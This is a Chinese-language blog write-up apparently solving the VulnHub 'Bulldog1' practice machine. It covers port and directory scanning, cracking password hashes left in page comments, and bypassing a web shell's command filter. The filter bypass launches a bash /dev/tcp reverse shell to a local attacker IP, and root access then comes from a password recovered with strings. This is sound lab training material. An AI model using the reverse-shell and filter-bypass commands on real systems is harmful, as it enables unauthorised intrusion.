vulnhub靶机-Bulldog1

难度:初级

知识点:

命令执行绕过

利用用户文件提权

环境准备

靶机下载

下载靶机ova文件之后,直接右键导入虚拟机即可,网卡设置为net模式

1593676630500

网络配置

参考文章:https://blog.csdn.net/Eastmount/article/details/106066009

到开机页面选择第二个Ubuntu的高级选项,如果启动网络正常的话可以直接开机,如果网络不正常可以按下面步骤操作。进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。
1590843558640

回车后会弹出选择界面,选择root一行回车,接着再次回车进入命令行模式。

1590843569852

输入"mount -o rw,remount / "命令,再配置网络问卷,否则后面可能无法保存网络配置文件,这个命令让我们的 / 路径文件系统的可读模式能自由修改。接着输入命令查看网卡。

mount -o rw,remount /
ifconfig -a

1590843612115

这里是ens33,然后继续输入命令修改网络配置文件。输入I修改模式,如下图所示。

vi /etc/network/interfaces

修改这两个地方,改成你的网卡名称,然后输入“:wq”保存。
1590843639246

最后输入reboot重启即可。

信息收集

主机发现

nmap -sP 192.168.211.1/24
或者
arp-scan l

1590844468031

发现目标主机的ip地址为192.168.211.149
扫描端口

nmap -A 192.168.211.149 -p 1-65535

1590844693656

发现主机开放了23 80 8080 三个端口
先从80端口入手
访问http://192.168.211.149为一个普通网站,只有一个按钮,使用扫描器扫描一下网站目录
1590844936041

访问admin,跳转到网站后台,是用python写的框架
之后进行指纹识别whatweb http://192.168.211.149
1590845230405

没什么新的发现,在使用nikto扫描一下

nikto -h http://192.168.211.149

1590846538055

发现了一个/dev目录

使用dirb扫描
dirb http://192.168.211.149
1590846702695

访问/dev/shell,显示必须通过验证才能使用shell
在/dev页面查看源码发现一些东西

1
2
3
4
5
6
7
8
9
<!--Need these password hashes for testing. Django's default is too complex-->
<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

猜测后面的MD5便是密码
一次破解,得到下面几组

sarah
bulldoglover

nick
bulldog

GETSHELL

之后去admin界面登录,登录之后再访问/dev/shell发现可以执行一些命令
1590847415016

接下来想办法反弹shell,由于限制了命令的执行,所以要想办法绕过。这里有echo命令,所以可以考虑将需要的命令写入文件,之后再使用bash执行。并且使用组合命令便可以绕过限制
pwd&&id
1590848038242

所以执行
echo 'bash -i >& /dev/tcp/192.168.211.135/7777 0>&1' > sss
ls && bash sss
即可进行反弹shell

1590848328456

1
python -c 'import pty;pty.spawn("/bin/bash")'		#进入交互模式

提权

在靶机中寻找各种可利用的文件,最后在/home/bulldogadmin/.hiddenadmindirectory目录下发现了一个customPermissionApp文件。之后便是看别人操作:

使用strings命令查看可执行文件中的字符

strings customPermissionApp

1590882922078

发现几串字符,猜测拼接后为密码,去掉最后的H

SUPERultimatePASSWORDyouCANTget
可以看到很明显的password

1
sudo su root	 	#尝试登陆

输入上面的密码,成功获得root权限
1590884707940

附:

看了别人的解题过程,可以直接先cat /etc/passwd查看有哪些用户
在着重查看那个用户相关的文件find / -user bulldogadmin 2>/dev/null

这样效率高很多

文章作者:CyzCc
最后更新:2020年07月06日 16:07:52
原始链接:https://cyzcc.vip/2020/07/06/Bulldog1/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------